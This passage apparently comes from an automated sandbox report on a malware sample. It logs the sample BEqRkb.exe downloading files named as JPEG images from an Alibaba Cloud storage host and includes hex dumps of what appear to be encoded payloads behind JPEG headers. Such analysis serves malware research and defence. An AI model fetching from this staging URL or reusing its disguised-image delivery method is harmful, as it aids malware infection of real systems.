                                                                                      Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.450012118.178.60.94435776C:\Users\user\Documents\BEqRkb.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:54:21 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:54:21 UTC546INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:21 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 55085
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E3DA0BE373739B08967
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                                                      Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 12339968747348072397
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                                                      x-oss-server-time: 8
                                                                                      2025-01-09 00:54:21 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                      Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                                                      Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                                                      Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                                                      Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                                                      Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                                                      Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a
                                                                                      Data Ascii: yv#{wofKlY%'\*JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u*`vRP;\Xf b$*m*-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5
                                                                                      Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81
                                                                                      Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-*C.G!"#$g()*+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{|
                                                                                      2025-01-09 00:54:21 UTC4096INData Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91
                                                                                      Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~o


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.450013118.178.60.94435776C:\Users\user\Documents\BEqRkb.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 00:54:22 UTC115OUTGET /FOM-51.jpg HTTP/1.1
                                                                                      User-Agent: GetData
                                                                                      Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                      Cache-Control: no-cache
                                                                                      2025-01-09 00:54:23 UTC548INHTTP/1.1 200 OK
                                                                                      Server: AliyunOSS
                                                                                      Date: Thu, 09 Jan 2025 00:54:23 GMT
                                                                                      Content-Type: image/jpeg
                                                                                      Content-Length: 4859125
                                                                                      Connection: close
                                                                                      x-oss-request-id: 677F1E3F0747933433603512
                                                                                      Accept-Ranges: bytes
                                                                                      ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02"
                                                                                      Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT
                                                                                      x-oss-object-type: Normal
                                                                                      x-oss-hash-crc64ecma: 9060732723227198118
                                                                                      x-oss-storage-class: Standard
                                                                                      x-oss-ec: 0048-00000105
                                                                                      Content-Disposition: attachment
                                                                                      x-oss-force-download: true
                                                                                      Content-MD5: 7myj7qf5scgQWa71cKKMAg==
                                                                                      x-oss-server-time: 14
                                                                                      2025-01-09 00:54:23 UTC3548INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                                      Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                                                      Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                                                      Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                                                      Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                                                      Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                                                      Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                                                      Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                                                      2025-01-09 00:54:23 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                                                      Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
